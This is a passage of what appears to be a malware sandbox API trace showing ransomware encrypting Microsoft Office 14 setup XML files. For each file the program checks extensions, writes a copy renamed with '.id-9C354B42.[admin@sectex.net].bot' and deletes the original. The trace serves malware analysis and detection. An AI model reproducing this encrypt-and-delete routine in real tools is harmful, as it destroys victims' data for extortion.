	[0036.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106
	[0036.787] lstrlenW (lpString=".zip") returned 4
	[0036.787] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0036.787] lstrlenW (lpString=".rar") returned 4
	[0036.788] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0036.788] lstrlenW (lpString=".bz2") returned 4
	[0036.788] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0036.788] lstrlenW (lpString=".7z") returned 3
	[0036.788] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0036.788] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106
	[0036.788] lstrlenW (lpString=".dbf") returned 4
	[0036.788] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0036.788] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106
	[0036.788] lstrlenW (lpString=".1cd") returned 4
	[0036.788] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0036.788] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106
	[0036.788] lstrlenW (lpString=".jpg") returned 4
	[0036.788] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0036.788] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0036.788] lstrlenW (lpString="AccessMUISet.XML") returned 16
	[0036.788] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0036.790] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=819) returned 1
	[0036.790] CloseHandle (hObject=0x1a0) returned 1
	[0036.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml")) returned 0x20
	[0036.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0036.790] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.790] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0036.791] GetLastError () returned 0x0
	[0036.791] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x333, lpOverlapped=0x0) returned 1
	[0036.792] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x340, lpOverlapped=0x0) returned 1
	[0036.793] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0036.793] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0036.793] SetEndOfFile (hFile=0x1b0) returned 1
	[0036.793] CloseHandle (hObject=0x1b0) returned 1
	[0036.794] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.794] SetEndOfFile (hFile=0x1a0) returned 1
	[0036.795] CloseHandle (hObject=0x1a0) returned 1
	[0036.795] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0036.795] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml")) returned 1
	[0036.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109
	[0036.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109
	[0036.795] lstrlenW (lpString=".doc") returned 4
	[0036.795] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0036.795] lstrlenW (lpString=".docx") returned 5
	[0036.795] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1
	[0036.795] lstrlenW (lpString=".pdf") returned 4
	[0036.795] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0036.795] lstrlenW (lpString=".xls") returned 4
	[0036.795] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0036.795] lstrlenW (lpString=".xlsx") returned 5
	[0036.796] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1
	[0036.796] lstrlenW (lpString=".ppt") returned 4
	[0036.796] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0036.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109
	[0036.796] lstrlenW (lpString=".zip") returned 4
	[0036.796] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0036.796] lstrlenW (lpString=".rar") returned 4
	[0036.796] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0036.796] lstrlenW (lpString=".bz2") returned 4
	[0036.796] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0036.796] lstrlenW (lpString=".7z") returned 3
	[0036.796] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0036.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109
	[0036.796] lstrlenW (lpString=".dbf") returned 4
	[0036.796] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0036.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109
	[0036.796] lstrlenW (lpString=".1cd") returned 4
	[0036.796] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0036.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109
	[0036.796] lstrlenW (lpString=".jpg") returned 4
	[0036.796] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0036.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109
	[0036.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109
	[0036.796] lstrlenW (lpString=".doc") returned 4
	[0036.796] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0036.796] lstrlenW (lpString=".docx") returned 5
	[0036.796] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1
	[0036.796] lstrlenW (lpString=".pdf") returned 4
	[0036.796] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0036.796] lstrlenW (lpString=".xls") returned 4
	[0036.796] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0036.796] lstrlenW (lpString=".xlsx") returned 5
	[0036.796] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1
	[0036.796] lstrlenW (lpString=".ppt") returned 4
	[0036.797] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0036.797] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109
	[0036.797] lstrlenW (lpString=".zip") returned 4
	[0036.797] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0036.797] lstrlenW (lpString=".rar") returned 4
	[0036.797] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0036.797] lstrlenW (lpString=".bz2") returned 4
	[0036.797] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0036.797] lstrlenW (lpString=".7z") returned 3
	[0036.797] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0036.797] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109
	[0036.797] lstrlenW (lpString=".dbf") returned 4
	[0036.797] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0036.797] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109
	[0036.797] lstrlenW (lpString=".1cd") returned 4
	[0036.797] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0036.797] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109
	[0036.797] lstrlenW (lpString=".jpg") returned 4
	[0036.797] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0036.797] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0036.797] lstrlenW (lpString="SETUP.XML") returned 9
	[0036.797] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0036.798] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=2624) returned 1
	[0036.798] CloseHandle (hObject=0x1a0) returned 1
	[0036.798] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml")) returned 0x20
	[0036.798] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.798] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0036.798] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.798] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.799] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0036.799] GetLastError () returned 0x0
	[0036.799] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0xa40, lpOverlapped=0x0) returned 1
	[0036.800] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xa50, lpOverlapped=0x0) returned 1
	[0036.801] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0036.801] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0036.801] SetEndOfFile (hFile=0x1b0) returned 1
	[0036.801] CloseHandle (hObject=0x1b0) returned 1
	[0036.802] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.802] SetEndOfFile (hFile=0x1a0) returned 1
	[0036.803] CloseHandle (hObject=0x1a0) returned 1
	[0036.803] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0036.803] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml")) returned 1
	[0036.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102
	[0036.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102
	[0036.803] lstrlenW (lpString=".doc") returned 4
	[0036.803] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0036.803] lstrlenW (lpString=".docx") returned 5
	[0036.803] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0036.803] lstrlenW (lpString=".pdf") returned 4
	[0036.803] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0036.803] lstrlenW (lpString=".xls") returned 4
	[0036.803] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0036.804] lstrlenW (lpString=".xlsx") returned 5
	[0036.804] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0036.804] lstrlenW (lpString=".ppt") returned 4
	[0036.804] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0036.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102
	[0036.804] lstrlenW (lpString=".zip") returned 4
	[0036.804] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0036.804] lstrlenW (lpString=".rar") returned 4
	[0036.804] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0036.804] lstrlenW (lpString=".bz2") returned 4
	[0036.804] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0036.804] lstrlenW (lpString=".7z") returned 3
	[0036.804] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0036.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102
	[0036.804] lstrlenW (lpString=".dbf") returned 4
	[0036.804] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0036.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102
	[0036.804] lstrlenW (lpString=".1cd") returned 4
	[0036.804] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0036.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102
	[0036.804] lstrlenW (lpString=".jpg") returned 4
	[0036.804] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0036.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102
	[0036.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102
	[0036.804] lstrlenW (lpString=".doc") returned 4
	[0036.804] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0036.804] lstrlenW (lpString=".docx") returned 5
	[0036.804] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0036.804] lstrlenW (lpString=".pdf") returned 4
	[0036.804] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0036.804] lstrlenW (lpString=".xls") returned 4
	[0036.804] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0036.804] lstrlenW (lpString=".xlsx") returned 5
	[0036.804] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0036.805] lstrlenW (lpString=".ppt") returned 4
	[0036.805] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0036.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102
	[0036.805] lstrlenW (lpString=".zip") returned 4
	[0036.805] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0036.805] lstrlenW (lpString=".rar") returned 4
	[0036.805] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0036.805] lstrlenW (lpString=".bz2") returned 4
	[0036.805] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0036.805] lstrlenW (lpString=".7z") returned 3
	[0036.805] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0036.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102
	[0036.805] lstrlenW (lpString=".dbf") returned 4
	[0036.805] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0036.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102
	[0036.805] lstrlenW (lpString=".1cd") returned 4
	[0036.805] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0036.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102
	[0036.805] lstrlenW (lpString=".jpg") returned 4
	[0036.805] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0036.805] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0036.805] lstrlenW (lpString="ExcelMUI.XML") returned 12
	[0036.805] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0036.806] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=1565) returned 1
	[0036.806] CloseHandle (hObject=0x1a0) returned 1
	[0036.806] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml")) returned 0x20
	[0036.806] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0036.806] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.806] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0036.806] GetLastError () returned 0x0
	[0036.806] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x61d, lpOverlapped=0x0) returned 1
	[0036.808] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x620, lpOverlapped=0x0) returned 1
	[0036.809] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0036.809] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0036.809] SetEndOfFile (hFile=0x1b0) returned 1
	[0036.809] CloseHandle (hObject=0x1b0) returned 1
	[0036.809] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.810] SetEndOfFile (hFile=0x1a0) returned 1
	[0036.810] CloseHandle (hObject=0x1a0) returned 1
	[0036.810] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0036.811] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml")) returned 1
	[0036.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104
	[0036.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104
	[0036.811] lstrlenW (lpString=".doc") returned 4
	[0036.811] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0036.811] lstrlenW (lpString=".docx") returned 5
	[0036.811] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0036.811] lstrlenW (lpString=".pdf") returned 4
	[0036.811] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0036.811] lstrlenW (lpString=".xls") returned 4
	[0036.811] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0036.811] lstrlenW (lpString=".xlsx") returned 5
	[0036.811] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0036.811] lstrlenW (lpString=".ppt") returned 4
	[0036.811] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0036.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104
	[0036.811] lstrlenW (lpString=".zip") returned 4
	[0036.811] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0036.811] lstrlenW (lpString=".rar") returned 4
	[0036.811] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0036.811] lstrlenW (lpString=".bz2") returned 4
	[0036.811] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0036.811] lstrlenW (lpString=".7z") returned 3
	[0036.811] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
